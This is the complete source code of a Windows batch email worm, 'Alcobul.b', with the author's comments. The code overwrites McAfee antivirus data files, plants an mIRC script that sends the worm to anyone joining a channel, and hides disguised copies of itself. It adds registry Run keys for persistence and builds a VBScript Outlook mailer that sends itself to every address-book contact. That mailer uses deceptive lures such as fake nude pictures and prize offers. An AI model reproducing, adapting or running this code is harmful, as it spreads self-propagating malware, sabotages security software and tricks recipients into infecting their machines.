Email-Worm.BAT.Alcobul.b - Source Code

1. :: console output is turned off and console is redirected to nul to prevent user interruptions
2.  
3. @echo off
4.  
5. ctty nul
6.  
7.  
8.  
9. :: Modify McAfee Dat files... Can anyone tell me where the dat files of AVP, Pccllin, fprot are located?
10.  
11. for %%f in (C:\progra~1\mcafee\mcafee~1\*.dat) do copy %0 %%f
12.  
13.  
14.  
15. :: spread to IRC
16.  
17. del c:\mIRC\script.ini
18.  
19. echo [script] > c:\mIRC\script.ini
20.  
21. echo n0= on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\WINDOWS\XPUpgrade.bat } >> c:\mIRC\script.ini
22.  
23. echo n1= /join #Beginner >> c:\mIRC\script.ini
24.  
25.  
26.  
27. :: goto root directory
28.  
29. cd\
30.  
31.  
32.  
33. :: make a hideaway folder, stealth with attrib
34.  
35. md XP
36.  
37. attrib +h +r c:\XP
38.  
39.  
40.  
41. :: spawn 8 clones.. some will be randomly used in attachments..
42.  
43. copy %0 c:\XP\xp.bat
44.  
45. copy %0 c:\Recycled\xp.bat
46.  
47. copy %0 c:\WINDOWS\HTTPRedirect.htm.bat
48.  
49. copy %0 c:\WINDOWS\SYSTEM32\Redirection.exe.bat
50.  
51. copy %0 c:\WINDOWS\COMMAND\PageRedirect.asp.bat
52.  
53. copy %0 c:\Redirect.php.bat
54.  
55. copy %0 c:\WINDOWS\SYSTEM\Redirection.bat
56.  
57. copy %0 c:\WINDOWS\XPUpgrade.bat
58.  
59.  
60.  
61. :: modify registry.. make worm run @ startup
62.  
63. echo REGEDIT4 > c:\X.reg
64.  
65. echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\X.reg
66.  
67. echo "PX"="c:\\XP\\xp.bat" >> c:\X.reg
68.  
69. echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\X.reg
70.  
71. echo "VPX"="c:\\XP\\X.vbs" >> c:\X.reg
72.  
73. echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\X.reg
74.  
75. echo "PXV"="c:\\Recycled\\xp.bat" >> c:\X.reg
76.  
77. regedit /s c:\X.reg
78.  
79. del c:\X.reg
80.  
81.  
82.  
83. :: is all new improved VBScript mailer present in c:\?
84.  
85. if exist c:\X.vbs goto goldfinger
86.  
87.  
88.  
89. :: if not, make the all new improved VBScript mailer
90.  
91. echo.on error resume next > c:\X.vbs
92.  
93. echo dim a,b,c,d,e >> c:\X.vbs
94.  
95. echo yelp = "Take a look at this.." >> c:\X.vbs
96.  
97. echo sex = "Hello former classmate.. I'm Heather and I have included a file which will redirect you to my webpage.. Full of nude picutres and stuff.. See you soon." >> c:\X.vbs
98.  
99. echo drugs = "You've won a free plane ticket to Hawaii. To claim your prize, we included a redirection software for security purposes. Only from FlyHawaii.com" >> c:\X.vbs
100.  
101. echo ass = "Wscript.Shell" >> c:\X.vbs
102.  
103. echo reg = "Check out my nude picture gallery.. Sarah.." >> c:\X.vbs
104.  
105. echo carry = "Hi there!" >> c:\X.vbs
106.  
107. echo hole = "Outlook.Application" >> c:\X.vbs
108.  
109. echo eins = "Hey.. Your mom sent me this message.. How dare your mom talk to me like that.. Shit!" >> c:\X.vbs
110.  
111. echo shit = "MAPI" >> c:\X.vbs
112.  
113. echo cum = "Hi there..You've just won a free backstage pass... Watch your favourite band/boyband perform live..Just tell us who do you want to see by clicking at this redirection software.. We make dreams come true..FreePasses.com" >> c:\X.vbs
114.  
115. echo dork = "Hello!" >> c:\X.vbs
116.  
117. echo suck = "I wanna tell you how much I adore you.." >> c:\X.vbs
118.  
119. echo set a = Wscript.CreateObject(ass) >> c:\X.vbs
120.  
121. echo punk = array(yelp, carry, dork, suck) >> c:\X.vbs
122.  
123. echo Randomize >> c:\X.vbs
124.  
125. echo rock = punk(Int(Rnd * 4)) >> c:\X.vbs
126.  
127. echo set b = CreateObject(hole) >> c:\X.vbs
128.  
129. echo set c = b.GetNameSpace(shit) >> c:\X.vbs
130.  
131. echo ska = array(cum, eins, sex, drugs, reg, yelp) >> c:\X.vbs
132.  
133. echo Randomize >> c:\X.vbs
134.  
135. echo reggae = ska(Int(Rnd * 6)) >> c:\X.vbs
136.  
137. echo for y = 1 To c.AddressLists.Count >> c:\X.vbs
138.  
139. echo phile = "c:\WINDOWS\HTTPRedirect.htm.bat" >> c:\X.vbs
140.  
141. echo set d = c.AddressLists(y) >> c:\X.vbs
142.  
143. echo phile1 = "c:\WINDOWS\SYSTEM32\Redirection.exe.bat" >> c:\X.vbs
144.  
145. echo x = 1 >> c:\X.vbs
146.  
147. echo set e = b.CreateItem(0) >> c:\X.vbs
148.  
149. echo phile2 = "c:\WINDOWS\COMMAND\PageRedirect.asp.bat" >> c:\X.vbs
150.  
151. echo for o = 1 To d.AddressEntries.Count >> c:\X.vbs
152.  
153. echo f = d.AddressEntries(x) >> c:\X.vbs
154.  
155. echo e.Recipients.Add f >> c:\X.vbs
156.  
157. echo x = x + 1 >> c:\X.vbs
158.  
159. echo next >> c:\X.vbs
160.  
161. echo e.Subject = rock >> c:\X.vbs
162.  
163. echo phile3 = "c:\Redirect.php.bat" >> c:\X.vbs
164.  
165. echo e.Body = reggae >> c:\X.vbs
166.  
167. echo phile4 = "c:\WINDOWS\SYSTEM\Redirection.bat" >> c:\X.vbs
168.  
169. echo guns = array(phile, phile1, phile2, phile3, phile4) >> c:\X.vbs
170.  
171. echo Randomize >> c:\X.vbs
172.  
173. echo roses = guns(Int(Rnd * 5)) >> c:\X.vbs
174.  
175. echo e.Attachments.Add (roses) >> c:\X.vbs
176.  
177. echo e.DeleteAfterSubmit = True >> c:\X.vbs
178.  
179. echo e.Send >> c:\X.vbs
180.  
181. echo f = "" >> c:\X.vbs
182.  
183. echo next >> c:\X.vbs
184.  
185.  
186.  
187. :: put a copy of mailer in hideaway directory
188.  
189. copy c:\X.vbs c:\XP
190.  
191.  
192.  
193. :: Mailer present
194.  
195. :goldfinger
196.  
197.  
198.  
199. :: for assurance
200.  
201. copy c:\X.vbs c:\XP
202.  
203.  
204.  
205. :: Mail with attachment
206.  
207. start c:\X.vbs
208.  
209.  
210.  
211. :: hide core files
212.  
213. attrib +h +r c:\X.vbs
214.  
215. attrib +h +r c:\XP\X.vbs
216.  
217. attrib +h +r c:\XP\xp.bat
218.  
219.  
220.  
221. :: Good bye!
222.  
223. exit
224.  
225.  
226.  
227. ::Redirection by Alcopaul
228.